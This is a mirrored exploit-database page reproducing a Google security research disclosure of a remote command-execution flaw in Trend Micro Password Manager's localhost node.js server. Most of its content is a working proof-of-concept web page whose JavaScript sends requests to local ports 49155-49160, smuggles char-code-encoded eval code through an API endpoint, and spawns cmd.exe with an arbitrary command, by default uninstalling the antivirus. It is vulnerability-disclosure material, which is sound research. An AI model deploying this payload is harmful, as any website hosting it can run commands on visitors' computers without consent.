首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TrendMicro node.js HTTP Server Listening on localhost Can Execute Commands
来源:https://code.google.com/p/google-security-research 作者:Google 发布时间:2016-01-12  
<!--
Source: https://code.google.com/p/google-security-research/issues/detail?id=693
 
When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.
 
http://www.trendmicro.com/us/home/products/software/password-manager/index.html
 
This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.
 
It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().
 
This means any website can launch arbitrary commands, like this:
 
x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};
 
(Note that you cannot read the response due to the same origin policy, but it doesn't matter - the command is still executed).
-->
 
<html>
<head>
    <title>Trend Micro Maximum Security 10 Exploit</title>
</head>
<body>
    <p>
    Sample exploit for Trend Micro Maximum Security 10.
    <p>
    -- Tavis Ormandy.
    <p>
    Command: <input id="command" value="C:/PROGRA~1/TRENDM~1/Titanium/Remove.exe" size="64">
    <p>
    <a href="javascript:begin()">Click Here</a> to run the command above (the default will uninstall Trend Micro Maximum).
    <p>
    <img src="http://reactiongifs.us/wp-content/uploads/2013/02/awesome_to_the_max.gif">
<script>
    function begin() {
        // The command you want to run, arguments will work but don't use single quotes.
        // Lets uninstall Trend Micro.
        var cmd  = document.getElementById('command').value;
 
        // Start port, Trend Micro trys top open a port starting here until it works.
        var port = 49155;
 
        // Wrapper code to start cmd.
        var code = "topWindow.require('child_process').spawn('cmd', [ '/c', '" + cmd + "' ])"
 
        // We can't send quotes, so encode that via character codes.
        code = code.split('').map(function(a){ return a.charCodeAt(0) }).join(',');
 
        // Create the XHR's
        for (; port <= 49160; port++) {
            var x = new XMLHttpRequest();
 
            x.open('GET', 'https://localhost:' + port + '/api/showSB?url=javascript:eval(String.fromCharCode(' + code + '))', false);
 
            // We can't tell if it worked because of the cross domain policy.
            try { x.send(); } catch (e) {};
        }
    }
</script>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KeePass Password Safe Classic
·Grassroots DICOM (GDCM) 2.6.0
·Amanda <= 3.3.1 - Local Root E
·FortiGate OS Version 4.x - 5.0
·Linux Kernel overlayfs Local P
·Internet Explorer 11.0.9600.18
·Symantec Endpoint Protection 1
·SNScan 1.05 - Scan Hostname/IP
·D-Link DCS-931L Arbitrary File
·Konica Minolta FTP Utility 1.0
·Ubuntu 14.04 LTS, 15.10 overla
·WhatsUp Gold 16.3 - Unauthenti
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved